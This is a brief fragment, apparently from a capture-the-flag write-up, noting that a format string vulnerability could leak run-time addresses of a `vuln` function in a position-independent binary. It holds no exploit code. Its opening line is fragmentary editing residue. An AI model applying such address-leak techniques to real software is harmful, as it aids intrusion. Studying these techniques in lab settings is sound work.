about this: -[image here] + We identify this as a format string vulnerability that may help us get more information. Notably, since we also aren't given the address of main like in PIE time 1, we may be able to use this to get more information about the run-time addresses of `vuln`.